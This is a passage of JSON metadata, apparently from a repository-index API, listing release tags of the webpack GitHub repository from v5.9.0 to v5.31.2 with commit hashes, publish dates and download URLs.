_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/